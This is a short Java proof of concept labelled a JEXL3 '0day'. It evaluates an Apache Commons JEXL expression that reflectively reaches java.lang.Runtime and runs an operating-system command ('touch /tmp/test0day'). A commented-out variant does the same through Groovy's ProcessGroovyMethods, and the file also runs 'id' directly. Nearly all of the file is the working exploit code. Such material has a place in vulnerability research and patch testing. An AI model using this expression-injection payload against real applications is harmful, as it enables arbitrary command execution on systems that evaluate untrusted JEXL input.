jxel3 0day poc

import java.io.IOException;
import java.util.List;


import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;


public class elExp {
public static void main(String args[]) throws IOException {
// Create or retrieve an engine
   JexlEngine jexl = new JexlBuilder().create();
   // Create an expression
   //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
   
   //String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
   String jexlExp = "1.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"touch /tmp/test0day\")";
   JexlExpression e = jexl.createExpression( jexlExp );
   try {
   
Process process = new ProcessBuilder("id").start();
} catch (IOException e1) {
// TODO Auto-generated catch block
e1.printStackTrace();
}
   // Create a context and add data
   JexlContext jc = new MapContext();
   jc.set("foo", jexlExp );
   
   // Now evaluate the expression, getting the result
   Object o = e.evaluate(jc);
   System.out.println(o);
   }
}